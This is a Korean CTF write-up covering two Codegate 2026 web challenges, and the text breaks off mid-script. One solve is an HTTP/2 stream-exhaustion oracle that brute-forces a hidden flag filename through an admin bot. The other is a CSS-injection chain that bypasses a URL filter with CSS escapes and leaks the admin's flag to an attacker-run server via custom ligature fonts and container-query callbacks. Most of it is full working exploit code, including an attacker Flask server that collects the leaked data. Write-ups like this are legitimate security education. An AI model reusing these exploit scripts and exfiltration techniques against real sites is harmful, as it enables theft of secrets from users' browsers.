- web: NestJS + Express 5, MongoDB(Mongoose), JWT 인증
- bot: admin으로 로그인 후 신고된 URL을 방문하는 Puppeteer 봇 (20초 대기)
- mongo:
users,memos컬렉션
1. Flag Image Randomization
Dockerfile에서 빌드 시 플래그 이미지의 파일명이 랜덤화되어 저장됩니다.
# app/Dockerfile
RUN if [ -f /app/src/images/FLAG.png ]; then \
name=$(openssl rand -hex 8) && \
mv /app/src/images/FLAG.png /app/src/images/flag_$name.png; \
fi
2. Image Service — Admin Endpoint의 Prefix Matching
getAdminImagePath() 함수는 정확한 파일명 매칭에 실패하면 startsWith로 prefix matching을 수행합니다.
예를 들어, filename=flag_a를 요청하면 flag_a로 시작하는 파일이 있을 때 해당 파일을 반환합니다. 이를 통해 파일명을 한 글자씩 알아낼 수 있습니다.
// app/src/api/image/image.service.ts
getAdminImagePath(filename: string): string | null {
const imagePath = this.resolveSafePath(filename);
if (imagePath && existsSync(imagePath)) return imagePath;
// Exact match 실패 시 prefix matching fallback
const files = readdirSync(this.getImageDir());
const matched = files.find(file => file.startsWith(filename));
if (!matched) return null;
return this.resolveSafePath(matched);
}
반면, getImagePath() 함수는 파일 명이 정확히 매칭되는지만 확인합니다.
// app/src/api/image/image.service.ts
getImagePath(filename: string): string | null {
const imagePath = this.resolveSafePath(filename);
if (!imagePath || !existsSync(imagePath)) return null;
return imagePath;
}
3. Image Controller — Admin Guard + sec-fetch-site 체크
관리자 이미지 조회 API(/api/image/admin)는 다음과 같이 동작합니다.
AdminGuard:req.user.role === 'admin'이어야 접근 가능sec-fetch-site: same-origin체크: same-origin 요청만 허용- 파일이 없으면
return만 하고 응답 미반환
// app/src/api/image/image.controller.ts
@Get('/admin')
@UseGuards(AdminGuard)
async getImageAdmin(
@Query('filename') filename: string,
@Req() req: Request,
@Res() res: Response
): Promise<void> {
const site = req.get('sec-fetch-site');
if (site !== 'same-origin') throw new HttpException('Unauthorized.', 401);
if (!filename) throw new HttpException('filename is required.', 400);
const imagePath = this.imageService.getAdminImagePath(filename);
if (!imagePath) return; // ← 응답 미반환 & 연결 유지
return res.sendFile(imagePath);
}
일반 이미지 조회 API(/api/image/)도 동일하게 파일이 존재하지 않을 경우, 응답을 반환하지 않습니다.
즉, 관리자/일반 이미지 조회 모두 파일 명이 매칭되지 않을 경우, 응답을 반환하지 않고 연결을 유지한 상태가 됩니다.
@Get('/')
async getImage(@Query('filename') filename, @Res() res) {
if (!filename) throw new HttpException('filename is required.', 400);
const imagePath = this.imageService.getImagePath(filename);
if (!imagePath) return; // ← hang!
return res.sendFile(imagePath);
}
4. Memo Content — HTML Injection via @() Syntax
메모 생성 시, 메모 내용(content)에 @(filename) 패턴을 쓰면 자동으로 <img> 태그로 변환됩니다.
// app/src/api/memo/memo.service.ts
async createMemo(data: CreateMemoDto, author: string): Promise<void> {
const replacedContent = data.content.replace(/@\(([a-zA-Z0-9.]+)\)/g, (match, filename) => {
return `<img src="/api/image?filename=${filename}">`;
});
// ...
}
5. Shared Memo Page — View Increment Timing
<img> 태그는 화이트리스트에 포함되어 있어 직접 태그를 삽입할 수 있습니다.
// app/src/public/js/memo-shared.js
const renderMemo = (data) => {
const option = {
ALLOWED_TAGS: [
'b', 'strong', 'i', 'em', 'u', 's', 'del',
'p', 'br', 'ul', 'ol', 'li', 'span', 'img'
],
};
const sanitizedTitle = DOMPurify.sanitize(data.title, option);
const sanitizedContent = DOMPurify.sanitize(data.content, option);
title.innerHTML = sanitizedTitle;
content.innerHTML = sanitizedContent;
};
window.addEventListener("load", async () => {
const data = await fetchMemo();
if (!data) return;
renderMemo(data); // innerHTML로 content 삽입 → img 태그 로드 시작
await sleep(500); // 500ms 대기
await window.appCommon.getJson(`/api/memo/${data._id}/view`, { method: "POST" });
// ← view increment POST 요청
});
6. Bot Behavior
봇은 admin 권한으로 로그인한 후 신고된 URL을 방문하고 20초 동안 대기합니다. admin 세션을 가지고 있으므로 /api/image/admin 엔드포인트에 접근 가능합니다.
// bot/src/index.js
async function visitUrl(url) {
const browser = await puppeteer.launch({ /* ... */ });
const page = await browser.newPage();
// 1) admin으로 로그인
await page.goto(`${TARGET}/login`, { /* ... */ });
await page.type('input[name="username"]', ADMIN_USERNAME);
await page.type('input[name="password"]', ADMIN_PASSWORD);
await page.click('button[type="submit"]');
await delay(1000);
// 2) 신고된 URL 방문 후 20초 대기
await page.goto(url, { /* ... */ });
await delay(20000); // BOT_WAIT_MS
}
7. 공격 흐름
Oracle Mechanism
- 메모를 생성할 때 content에 다음과 같은 HTML을 삽입합니다:
<img src="/api/image/admin?filename=flag_X"> <!-- 테스트할 prefix --> <img src="/api/image?filename=nope_0"> <!-- blocker #0 --> <img src="/api/image?filename=nope_1"> <!-- blocker #1 --> ... <img src="/api/image?filename=nope_126"> <!-- blocker #126 --> -
총 128개의 이미지 요청 (1 admin + 127 blocker)이 발생한다.
- Prefix가 매칭되는 경우 (
flag_X가 실제 파일명의 prefix):- admin 이미지 → 파일 존재,
res.sendFile()로 정상 응답 → stream 해제 - 127개 blocker → 파일 없음,
return→ hang (127 streams 점유) - HTTP/2 stream 128개 중 127개 점유 → view POST 요청이 들어갈 여유 있음 →
views > 0
- admin 이미지 → 파일 존재,
- Prefix가 매칭되지 않는 경우:
- admin 이미지 → 파일 없음,
return→ hang (1 stream 점유) - 127개 blocker → 파일 없음,
return→ hang (127 streams 점유) - HTTP/2 stream 128개 전부 점유 → view POST 요청이 블로킹됨 →
views == 0
- admin 이미지 → 파일 없음,
따라서, views > 0이면 해당 prefix가 정답, views == 0이면 불일치라는 oracle이 성립하게 됩니다.
Brute-Force Flow
각 라운드에서 다음과 같이 동작하며, 플래그 이미지 파일 명을 알아낼 수 있습니다.
- 16개 후보 prefix로 memo 생성
- 각 memo를 share하여 UUID 발급
- 16개 shared URL을 봇에게 report
- 봇이 각 memo를 방문할 때까지 polling
- 정확히 1개만
views > 0이면 해당 글자가 정답
Round 1: flag_ + {0,1,...,f} → 16개 memo 생성 & share & report → views > 0인 것 = 첫 번째 hex char
Round 2: flag_X + {0,1,...,f} → 두 번째 hex char
...
Round 16: flag_XXXXXXXXXXXXXXX + {0,1,...,f} → 마지막 hex char
Exploit Code
import random
import string
import time
import subprocess
import requests
import urllib3
urllib3.disable_warnings()
APP = "https://15.165.70.183"
BOT = "http://15.165.70.183:5000"
REPORT_ORIGIN = "https://nginx"
CHARSET = "0123456789abcdef"
BLOCKERS = 127
POLL_INTERVAL = 2.0
POLL_ROUNDS = 15
ROUND_COOLDOWN = 22.0
FLAG_PREFIX = "flag_"
FLAG_HEX_LEN = 16 # openssl rand -hex 8 = 16 hex chars
ROUND_RETRIES = 5
s = requests.Session()
s.verify = False
def rand(n=10):
return "".join(random.choices(string.ascii_lowercase + string.digits, k=n))
def register_and_login():
username = f"user_{rand()}"
s.post(f"{APP}/api/auth/register", json={"username": username, "password": "qwer1234", "name": "x"})
s.post(f"{APP}/api/auth/login", json={"username": username, "password": "qwer1234"})
print(f"[+] logged in as {username}")
def get_memos():
return s.get(f"{APP}/api/user").json()["data"]["memos"]
def create_shared_memo(title, content):
s.post(f"{APP}/api/memo", json={"title": title, "content": content})
memo = next(m for m in get_memos() if m["title"] == title)
key = s.post(f"{APP}/api/memo/{memo['_id']}/share").json()["data"]["sharedKey"]
return memo["_id"], key
def report(shared_key):
url = f"{REPORT_ORIGIN}/memo/shared?key={shared_key}"
requests.post(f"{BOT}/report", json={"url": url}, timeout=10, verify=False)
def get_views(memo_id):
return s.get(f"{APP}/api/memo/{memo_id}").json()["data"]["views"]
def make_content(prefix):
token = rand()
blockers = "".join(f'<img src="/api/image?filename=nope_{token}_{i}">' for i in range(BLOCKERS))
return f'<img src="/api/image/admin?filename={prefix}">{blockers}'
def solve_round(prefix):
"""Try each candidate char, report all to bot, poll views to find the hit."""
for i in range(1, ROUND_RETRIES + 1):
candidates = []
for ch in CHARSET:
p = prefix + ch
title = f"{p}_{rand(8)}"
memo_id, key = create_shared_memo(title, make_content(p))
candidates.append((ch, memo_id, key))
for _, _, key in candidates:
report(key)
for poll in range(POLL_ROUNDS):
time.sleep(POLL_INTERVAL)
hits = [(ch, mid) for ch, mid, _ in candidates if get_views(mid) > 0]
print(f" poll={poll+1} hits={''.join(h[0] for h in hits) or '-'}")
if len(hits) == 1:
return hits[0][0]
if len(hits) > 1:
break
if i != ROUND_RETRIES:
time.sleep(ROUND_COOLDOWN)
raise RuntimeError(f"failed to resolve char for prefix {prefix!r}")
def fetch_flag_image(filename):
"""Download the flag image and open it."""
r = s.get(f"{APP}/api/image", params={"filename": filename})
if r.status_code != 200:
print(f"[-] failed to fetch image: {r.status_code}")
return
with open(filename, "wb") as f:
f.write(r.content)
print(f"[+] saved {filename} ({len(r.content)} bytes)")
try:
subprocess.run(["open", filename], check=False)
except Exception:
pass
def main():
register_and_login()
prefix = FLAG_PREFIX
start = len(prefix) - len("flag_")
for i in range(start, FLAG_HEX_LEN):
ch = solve_round(prefix)
prefix += ch
print(f"[+] recovered: {prefix} ({i+1}/{FLAG_HEX_LEN})")
if i < FLAG_HEX_LEN - 1:
time.sleep(ROUND_COOLDOWN)
filename = f"{prefix}.png"
print(f"[+] flag filename: {filename}")
fetch_flag_image(filename)
if __name__ == "__main__":
main()
Flag
codegate2026{HTTP2_has_many_streams!}
Sealed Board
게시판 서비스에서 admin bot의 브라우저에 렌더링되는 flag를 탈취하는 문제입니다.
단, flag는 #flag div에 렌더링되지만, 50ms 만에 제거됩니다.
1. 플래그 노출 조건 (app.py)
admin 판별은 admin 쿠키와 공유 토큰 비교로 이루어집니다. flag는 is_admin일 때만 템플릿에 전달됩니다.
def is_admin(req):
token = load_admin_token()
if not token:
return False
return req.cookies.get("admin", "") == token
@app.route("/")
def index():
flag = os.getenv("FLAG", "flag{DUMMY_FLAG}")
admin = is_admin(request)
user = current_user()
return render_template(
"index.html",
is_admin=admin,
flag=flag,
posts=visible_posts(user, admin),
max_len=MAX_POST_LEN,
current_user=user,
)
포스트 생성은 사용자당 1개, 최대 320자로 제한됩니다.
MAX_POST_LEN = 320
@app.route("/post", methods=["POST"])
def add_post():
...
if find_post_by_author(user):
return jsonify({"ok": False, "message": "one_post_per_user"}), 409
post = extract_post_text()
if not post or len(post) > MAX_POST_LEN:
return jsonify({"ok": False}), 400
...
모든 응답에 Document-Policy: force-load-at-top 헤더가 추가되어 scroll 기반 공격이 차단됩니다.
@app.after_request
def add_response_headers(response):
response.headers["Document-Policy"] = "force-load-at-top"
return response
admin일 때만 #flag div가 렌더링됩니다.
<main id="page" class="page">
...
<section class="feed">
...
<div id="post-list" class="post-list">
<div class="post-card">
<p class="post-empty">No visible posts yet.</p>
</div>
</div>
</section>
{% if is_admin %}
<div id="flag" data-protected-flag="1">{{ flag }}</div>
{% endif %}
</main>
2. CSS Injection (DOMPurify Sanitize + <style> 추출 (app.js))
<style> 블록이 DOMPurify 처리 전에 추출되고, sanitize 없이 원본 그대로 재삽입됩니다. 이로 인해, JS 코드를 실행할 수 없지만, 임의의 CSS를 주입할 수 있습니다.
const styleBlocks = extractStyleBlocks(raw);
const withoutStyles = raw.replace(STYLE_BLOCK_RE, "");
if (styleBlocks.some((cssText) => hasRemoteStyleReference(cssText))) {
return false;
}
const clean = DOMPurify.sanitize(withoutStyles, {
ALLOWED_TAGS: [
"a",
"b",
"blockquote",
"br",
"code",
"div",
"em",
"i",
"li",
"ol",
"p",
"pre",
"s",
"span",
"strong",
"u",
"ul",
],
ALLOWED_ATTR: ["class", "href", "rel", "target", "title"],
FORBID_TAGS: [
"audio",
"canvas",
"details",
"embed",
"form",
"iframe",
"img",
"input",
"math",
"object",
"option",
"select",
"source",
"summary",
"svg",
"textarea",
"track",
"video",
],
FORBID_ATTR: ["loading", "onerror", "onload", "src", "srcset", "style"],
ALLOW_DATA_ATTR: false,
KEEP_CONTENT: true,
});
3. CSS URL 필터 우회
hasRemoteStyleReference() 함수는 CSS 주석 제거 후 다음 패턴을 차단합니다.
/\b(?:https?|data)\s*:/i—http:,https:,data:프로토콜//문자열 — protocol-relative URL
const hasRemoteStyleReference = (cssText) => {
const normalized = stripCssComments(cssText);
return /\b(?:https?|data)\s*:/i.test(normalized) || normalized.includes("//");
};
하지만, CSS 이스케이프 시퀀스를 사용하면 이를 우회할 수 있습니다.
\68→h(CSS escape):\bword boundary가\68앞에서 매칭되지 않아 regex 우회\2f→/(CSS escape): 리터럴//가 존재하지 않아 substring 체크 우회- CSS 파서는 이스케이프를 정상적으로 해석하므로 유효한 URL로 동작
http://evil.com → \68ttp:\2f/evil.com
4. Flag 복원
아래 코드의 조건 분기를 분석하면, flag 텍스트가 복원되는 조건이 있습니다.
#flag 요소의 가시성을 50ms 주기로 감시합니다. display: none이면 유지, contents면 제거, checkVisibility()가 true면 제거합니다.
단, display가 none도 contents도 아니고 checkVisibility()가 false이면 textContent를 복원합니다.
| display | checkVisibility() | 결과 |
|---|---|---|
none |
- | 유지 (텍스트 비움 유지) |
contents |
- | 요소 제거 |
| 기타 | true |
요소 제거 |
| 기타 | false |
textContent 복원 |
(function() {
var p = document.getElementById('page');
if (!p) return;
var getProtectedFlag = function() {
for (var i = 0; i < p.children.length; i += 1) {
var node = p.children[i];
if (
node &&
node.id === 'flag' &&
node.getAttribute('data-protected-flag') === '1'
) {
return node;
}
}
return null;
};
var f = getProtectedFlag();
if (!f) return;
var saved = f.textContent;
f.textContent = '';
f.style.display = 'none';
var check = function() {
f = getProtectedFlag();
if (!f || !f.parentNode) return;
var display = getComputedStyle(f).display;
if (display === 'none') return;
if (display === 'contents') {
f.remove();
return;
}
if (f.checkVisibility()) {
f.remove();
return;
}
if (!f.textContent) f.textContent = saved;
};
setInterval(check, 50);
new MutationObserver(check).observe(p, { childList: true, subtree: true, attributes: true });
})();
게시글에 아래 CSS를 포함하게 되면, 플래그 복원 조건을 만족하게 됩니다.
#page { content-visibility: hidden } /* checkVisibility() → false 유도 */
#flag { display: block !important } /* display:none 분기 무력화 */
단, content-visibility:hidden은 descendant의 레이아웃까지 스킵하므로 그 상태에선 폰트 매칭과 컨테이너 쿼리도 동작하지 않습니다. 따라서, 외부 CSS에서 @keyframes로 reveal 시점을 분리해야 합니다.
즉, @keyframes reveal로 1.2초 지연 후, content-visibility:visible로 전환합니다.
50ms 내 flag 텍스트를 복원하고, reveal 시점에 비로소 폰트 로딩 / 너비 측정 / 컨테이너 쿼리 콜백이 발생하여 글자 유출이 가능합니다. reveal 이후엔 checkVisibility()가 true가 되어 guardian이 곧 요소가 제거됩니다.
@keyframes reveal {
from { content-visibility: hidden }
to { content-visibility: visible }
}
#page {
content-visibility: hidden;
animation: reveal 0.001s step-end forwards !important;
animation-delay: 1.2s !important;
}
5. 공격 기법: CSS Ligature + Container Query Exfiltration
<style>태그로 CSS를 주입하되,@import로 공격자 서버에서 전체 CSS를 로드- 공격자 서버에서 Custom OpenType Ligature 폰트를 동적으로 생성하여 제공
- Ligature 치환으로 known prefix + candidate char 조합이 고유한 너비의 글리프로 치환됨
- CSS Grid 레이아웃으로
#flag의 텍스트 너비가 컨테이너의 inline-size를 결정하게 함 @container쿼리로 너비 범위를 감지하여background-imageURL 콜백으로 문자를 유출
Custom Ligature 폰트 생성
OpenType clig (Contextual Ligatures) 피처를 사용합니다.
prefix 글리프 시퀀스 뒤에 candidate 글리프가 오면, 고유한 너비를 가진 치환 글리프로 대체됩니다.
def build_font(prefix: str, alphabet: str) -> bytes:
# 모든 기본 글리프는 advance width = 0
for ch in chars:
metrics[n] = (0, 0)
# 치환 글리프는 후보별로 고유한 너비
for i in range(len(alphabet)):
metrics[n] = (BASE_W + STEP_W * i, 0) # 400, 432, 464, ...
# clig 피처: prefix + candidate → match glyph
# sub g_0063 g_006f g_0064 g_0065 ... g_XXXX by m_XX;
addOpenTypeFeaturesFromString(fb.font, "\n".join(lines))
예를 들어 prefix가 codegate2026{이고 다음 글자가 b이면:
c,o,d,e,g,a,t,e,2,0,2,6,{,b시퀀스가 Ligature에 매칭- 해당 치환 글리프의 고유 너비가
#flag요소의 렌더링 너비를 결정
CSS Grid + Container Query 레이아웃
#page (inline-grid)
├── #flag (grid-area: 1/1, width: fit-content)
│ → 텍스트 너비가 컬럼 크기를 결정
└── .feed (grid-area: 1/1, container-type: inline-size)
└── #post-list
→ @container 쿼리로 너비 감지 → background-image 콜백
#flag와 .feed가 같은 그리드 셀을 차지하므로, #flag의 fit-content 너비가 max-content 컬럼 크기를 결정하고, .feed의 container-type: inline-size가 이 크기를 상속받습니다.
#page {
display: inline-grid !important;
grid-template-columns: max-content !important;
}
#flag {
grid-area: 1 / 1 !important;
width: fit-content !important;
font-family: "leak-..." !important;
font-feature-settings: "liga" 1, "clig" 1 !important;
}
.feed {
grid-area: 1 / 1 !important;
container-name: leak !important;
container-type: inline-size !important;
}
/* 각 후보 문자에 대한 너비 범위 감지 */
@container leak (12.8px < width) and (width < 13.8px) {
#post-list { background-image: url("ATTACKER/h?p=...&g=b&t=...") !important; }
}
6. 전체 공격 흐름
각 글자를 유출할 때마다 새로운 계정을 등록하고, 업데이트된 prefix로 새 포스트를 작성하여 반복합니다.
[Attacker] ─── 1. Register + Post (CSS injection) ───► [Webapp]
│
│ <style>@import "\68ttp:\2f/ATTACKER/c?p=...&a=...";</style>
│ <style>#page{content-visibility:hidden}#flag{display:block!important}</style>
│
[Attacker] ─── 2. Trigger bot ──────────────────────► [AdminBot]
│
[AdminBot] ─── 3. Visit /post/N ──────────► [Webapp]
│ (admin cookie set)
│
[Webapp] ─── 4. Render page ─────────────► [Admin Browser]
│ #flag div + CSS injection
│
[Admin Browser] ─── 5. @import CSS ─────────────► [Attacker Server]
│ GET /c?p=codegate2026{&a=...
│
[Admin Browser] ─── 6. Load font ──────────────► [Attacker Server]
│ GET /f?p=codegate2026{&a=...
│
[Admin Browser] ─── 7. Container query hit ────► [Attacker Server]
GET /h?p=codegate2026{&a=b&t=...
→ 다음 글자 'b' 유출!
Exploit Code
#!/usr/bin/env python3
"""
Sealed Board CTF — CSS Ligature + Container Query Flag Exfiltration
===================================================================
Attack chain:
1. After applying DOMPurify into raw css, it includes the <style> tag
2. CSS escape (\68ttp:\2f/) bypasses hasRemoteStyleReference filter
- \68ttp: avoids /\b(?:https?|data)\s*:/i regex match
- \2f/ avoids literal "//" substring check
3. @import loads external CSS from attacker server (no size limit)
4. Inline prelude sets #page { content-visibility:hidden } + #flag { display:block!important }
→ #flag is in a "not being rendered" subtree → checkVisibility()=false (per spec default)
→ Guardian restores flag textContent (display≠none/contents, checkVisibility()=false)
5. Custom OpenType font with clig ligatures:
known_prefix + candidate_char → replacement glyph with unique width
6. CSS Grid layout makes #flag's text width drive the container's inline-size
7. @container queries detect the width → fire background-image callback → leak char
Requirements:
pip install fonttools flask requests
Usage:
python3 solve.py \
--attacker http://host.docker.internal:5555 \
--target http://localhost:5000 \
--bot http://localhost:5001 \
--port 5555
The script runs an HTTP server on the specified port and orchestrates the
attack automatically, one character at a time.
"""
import argparse
import io
import json
import logging
import queue
import secrets
import threading
import time
import urllib.parse
import requests
from flask import Flask, Response
from flask import request as freq
from fontTools.feaLib.builder import addOpenTypeFeaturesFromString
from fontTools.fontBuilder import FontBuilder
from fontTools.pens.ttGlyphPen import TTGlyphPen
# ─── Constants ────────────────────────────────────────────────────────────────
UPM = 1000 # units per em
FONT_PX = 32 # font-size in CSS pixels
BASE_W = 400 # base glyph width (units) for candidate index 0
STEP_W = 32 # width increment per candidate index
# ─── Font Builder ─────────────────────────────────────────────────────────────
def _empty_glyph():
return TTGlyphPen(None).glyph()
def _gname(ch):
return f"g_{ord(ch):04x}"
def _mname(i):
return f"m_{i:02d}"
def _w_units(i):
return BASE_W + STEP_W * i
def _w_px(units):
return (units / UPM) * FONT_PX
def build_font(prefix: str, alphabet: str) -> bytes:
"""
Build a TrueType font with a clig ligature feature:
prefix_glyphs + candidate_glyph[i] → match_glyph[i] (unique width)
All base character glyphs have zero advance width so only the matched
substitution glyph contributes to the element's rendered width.
"""
chars = list(dict.fromkeys(alphabet + prefix))
order = [".notdef"]
glyphs = {".notdef": _empty_glyph()}
metrics = {".notdef": (0, 0)}
cmap = {}
for ch in chars:
n = _gname(ch)
order.append(n)
glyphs[n] = _empty_glyph()
metrics[n] = (0, 0)
cmap[ord(ch)] = n
for i in range(len(alphabet)):
n = _mname(i)
order.append(n)
glyphs[n] = _empty_glyph()
metrics[n] = (_w_units(i), 0)
fb = FontBuilder(UPM, isTTF=True)
fb.setupGlyphOrder(order)
fb.setupCharacterMap(cmap)
fb.setupGlyf(glyphs)
fb.setupHorizontalMetrics(metrics)
fb.setupHorizontalHeader(ascent=800, descent=-200)
fb.setupNameTable({
"familyName": "Leak", "styleName": "Regular",
"uniqueFontIdentifier": f"Leak-{len(prefix)}",
"fullName": "Leak Regular", "psName": "Leak-Regular",
})
fb.setupOS2(sTypoAscender=800, sTypoDescender=-200,
sTypoLineGap=0, usWinAscent=800, usWinDescent=200)
fb.setupPost()
fb.setupMaxp()
pfx_names = " ".join(_gname(c) for c in prefix)
lines = ["feature clig {"]
for i, ch in enumerate(alphabet):
lines.append(f" sub {pfx_names} {_gname(ch)} by {_mname(i)};")
lines.append("} clig;")
addOpenTypeFeaturesFromString(fb.font, "\n".join(lines))
buf = io.BytesIO()
fb.save(buf)
return buf.getvalue()
# ─── CSS Builder ──────────────────────────────────────────────────────────────
def build_css(prefix: str, alphabet: str, tag: str, base: str) -> str:
ep = urllib.parse.quote(prefix, safe="")
ea = urllib.parse.quote(alphabet, safe="")
et = urllib.parse.quote(tag, safe="")
font_url = f"{base}/f?p={ep}&a={ea}"
# Container query rules — one per candidate character
cq_rules = []
for i, ch in enumerate(alphabet):
cur = _w_units(i)
lo_u = _w_units(i - 1) if i > 0 else cur - STEP_W
hi_u = _w_units(i + 1) if i + 1 < len(alphabet) else cur + STEP_W
lo_px = _w_px((lo_u + cur) / 2.0)
hi_px = _w_px((cur + hi_u) / 2.0)
eg = urllib.parse.quote(ch, safe="")
hit_url = f"{base}/h?p={ep}&g={eg}&t={et}"
cq_rules.append(
f"@container leak ({lo_px:.1f}px < width) and (width < {hi_px:.1f}px) {{\n"
f" #post-list {{ background-image: url(\"{hit_url}\") !important; }}\n"
f"}}"
)
font_id = f"leak-{ep}"
return f"""\
@keyframes reveal {{
from {{ content-visibility: hidden }}
to {{ content-visibility: visible }}
}}
body::before {{
content: "A";
position: fixed; top: 0; left: 0;
color: transparent;
font-family: "{font_id}" !important;
font-size: {FONT_PX}px !important;
font-feature-settings: "liga" 1, "clig" 1 !important;
white-space: pre !important;
}}
#page {{
display: inline-grid !important;
grid-template-columns: max-content !important;
width: fit-content !important;
min-width: 0 !important;
content-visibility: hidden;
animation: reveal 0.001s step-end forwards !important;
animation-delay: 1.2s !important;
}}
#page > :not(.feed):not(#flag) {{
display: none !important;
}}
.feed {{
display: block !important;
grid-area: 1 / 1 !important;
width: auto !important;
min-width: 0 !important;
margin: 0 !important; padding: 0 !important; border: 0 !important;
background: transparent !important;
box-shadow: none !important;
container-name: leak !important;
container-type: inline-size !important;
}}
.feed > :not(#post-list) {{
display: none !important;
}}
#post-list {{
display: block !important;
width: 4px !important; height: 4px !important;
margin: 0 !important; padding: 0 !important; border: 0 !important;
background-repeat: no-repeat !important;
background-size: 1px 1px !important;
}}
#flag {{
display: block !important;
visibility: hidden !important;
grid-area: 1 / 1 !important;
width: fit-content !important;
margin: 0 !important; padding: 0 !important; border: 0 !important;
white-space: pre !important;
overflow: visible !important;
font-family: "{font_id}" !important;
font-size: {FONT_PX}px !important;
line-height: 1 !important;
font-kerning: none !important;
font-feature-settings: "liga" 1, "clig" 1 !important;
}}
@font-face {{
font-family: "{font_id}";
src: url("{font_url}") format("truetype");
}}
{chr(10).join(cq_rules)}
"""
# ─── Attacker Flask Server ───────────────────────────────────────────────────
app = Flask(__name__)
hit_queue: queue.Queue = queue.Queue()
# Suppress Flask/Werkzeug request logs
logging.getLogger("werkzeug").setLevel(logging.ERROR)
@app.get("/c")
def serve_css():
"""Serve dynamically generated CSS payload."""
p = freq.args.get("p", "")
a = freq.args.get("a", "abcdefghijklmnopqrstuvwxyz0123456789_}")
t = freq.args.get("t", "x")
base = f"{freq.scheme}://{freq.host}"
return Response(build_css(p, a, t, base), mimetype="text/css")
@app.get("/f")
def serve_font():
"""Serve dynamically generated ligature font."""
p = freq.args.get("p", "")
a = freq.args.get("a", "abcdefghijklmnopqrstuvwxyz0123456789_}")
return Response(
build_font(p, a), mimetype="font/ttf",
headers={"Access-Control-Allow-Origin": "*"},
)
@app.get("/h")
def serve_hit():
"""Receive exfiltration callback from admin browser."""
p = freq.args.get("p", "")
g = freq.args.get("g", "")
t = freq.args.get("t", "")
if g:
hit_queue.put({"prefix": p, "guess": g, "tag": t, "ts": time.time()})
print(f" [HIT] prefix='{p}' next='{g}' tag='{t}'")
return Response(b"", mimetype="image/png")
# ─── Exploit Client ──────────────────────────────────────────────────────────
def css_escape_url(url: str) -> str:
"""
Minimally CSS-escape a URL to bypass hasRemoteStyleReference():
\\68ttp: → breaks \\b(?:https?)\\s*: regex (no word boundary before \\68)
\\2f/ → avoids literal "//" substring
CSS parser still resolves escapes → valid URL.
"""
return (url
.replace("http://", "\\68ttp:\\2f/")
.replace("https://", "\\68ttps:\\2f/"))
def make_payload(attacker: str, prefix: str, alphabet: str, tag: str) -> str:
"""
Build the HTML payload to inject as a post (must be ≤320 chars).
Two <style> blocks:
1. @import with CSS-escaped URL → loads full CSS from attacker server
2. Inline prelude:
- #page{content-visibility:hidden} ← makes #flag's checkVisibility()=false
(guardian bypass; spec default opts)
- #flag{display:block!important} ← overrides IIFE's inline display:none
so guardian falls through to restore
"""
ep = urllib.parse.quote(prefix, safe="")
ea = urllib.parse.quote(alphabet, safe="")
et = urllib.parse.quote(tag, safe="")
css_url = f"{attacker}/c?p={ep}&a={ea}&t={et}"
escaped = css_escape_url(css_url)
prelude = "#page{content-visibility:hidden}#flag{display:block!important}"
return f'<style>@import "{escaped}";</style><style>{prelude}</style>x'
def register_and_post(target: str, payload: str) -> int | None:
"""Register a throwaway account and create a single post."""
s = requests.Session()
user = "u" + secrets.token_hex(4)
pwd = secrets.token_hex(8)
r = s.post(f"{target}/register",
data={"username": user, "password": pwd},
allow_redirects=False)
if r.status_code not in (200, 302):
print(f"[-] Register failed: {r.status_code}")
return None
r = s.post(f"{target}/post",
data={"post": payload},
allow_redirects=False)
try:
data = r.json()
except Exception:
print(f"[-] Post failed: {r.text[:200]}")
return None
if not data.get("ok"):
print(f"[-] Post failed: {data}")
return None
pid = data["post"]["id"]
print(f"[+] User '{user}' → post #{pid}")
return pid
def trigger_bot(bot: str, path: str, team_id: str = "solver") -> str | None:
"""Ask admin bot to visit a webapp path."""
url = f"{bot}/visit?url={urllib.parse.quote(path, safe='/?:=&')}"
try:
r = requests.get(url, headers={"X-Team-Id": team_id}, timeout=10)
data = r.json()
except Exception as e:
print(f"[-] Bot request failed: {e}")
return None
job_id = data.get("job_id")
if not job_id:
print(f"[-] Bot error: {data}")
return job_id
def wait_bot_done(bot: str, job_id: str, timeout: float = 60.0):
"""Poll bot job status until finished."""
deadline = time.time() + timeout
while time.time() < deadline:
try:
r = requests.get(f"{bot}/visit/{job_id}", timeout=5)
status = r.json().get("status", "")
if status in ("ok", "error"):
return status
except Exception:
pass
time.sleep(2)
return "timeout"
def drain_hits(tag: str, timeout: float = 5.0) -> str | None:
"""Drain the hit queue and return the guess matching our tag."""
deadline = time.time() + timeout
result = None
while time.time() < deadline:
try:
item = hit_queue.get(timeout=0.5)
if item["tag"] == tag:
result = item["guess"]
except queue.Empty:
if result is not None:
break
return result
# ─── Orchestrator ─────────────────────────────────────────────────────────────
def solve(args):
prefix = args.prefix
alphabet = args.alphabet
print(json.dumps({
"stage": "start", "prefix": prefix, "alphabet": alphabet,
"attacker": args.attacker, "target": args.target, "bot": args.bot,
}, indent=2), flush=True)
while not prefix.endswith("}"):
tag = secrets.token_hex(4)
payload = make_payload(args.attacker, prefix, alphabet, tag)
if len(payload) > 320:
print(json.dumps({
"stage": "error", "message": "payload too long",
"length": len(payload), "max": 320,
}), flush=True)
return
print(json.dumps({
"stage": "position", "position": len(prefix),
"prefix": prefix, "payload_len": len(payload), "tag": tag,
}), flush=True)
# Step 1: Register + Post (once per prefix)
pid = register_and_post(args.target, payload)
if pid is None:
time.sleep(2)
continue
# Step 2: Trigger bot once
while True:
job_id = trigger_bot(args.bot, f"/post/{pid}", args.team_id)
if job_id:
break
print(json.dumps({
"stage": "bot_wait", "message": "retrying in 10s",
}), flush=True)
time.sleep(10)
print(json.dumps({
"stage": "bot_triggered", "job_id": job_id, "post_id": pid,
}), flush=True)
# Step 3: Wait for bot completion + hit callback
guess = None
bot_status = None
while guess is None:
# Poll bot status if not done yet
if bot_status is None:
try:
r = requests.get(f"{args.bot}/visit/{job_id}", timeout=5)
st = r.json().get("status", "")
if st in ("ok", "error"):
bot_status = st
print(json.dumps({
"stage": "bot_done", "status": st,
"job_id": job_id, "post_id": pid,
}), flush=True)
except Exception:
pass
# Check for hit callback
try:
item = hit_queue.get(timeout=2)
if item["tag"] == tag:
guess = item["guess"]
except queue.Empty:
pass
prefix += guess
print(json.dumps({
"stage": "found", "guess": guess, "prefix": prefix,
"post_id": pid, "job_id": job_id,
}), flush=True)
time.sleep(args.step_delay)
print(json.dumps({"ok": True, "flag": prefix}, indent=2))
def main():
ap = argparse.ArgumentParser(
description="Sealed Board CTF — CSS ligature exfiltration exploit")
ap.add_argument("--attacker", required=True,
help="Attacker server URL reachable from admin bot "
"(e.g., http://YOUR_IP:8000)")
ap.add_argument("--target", default="http://localhost:5000",
help="Webapp URL")
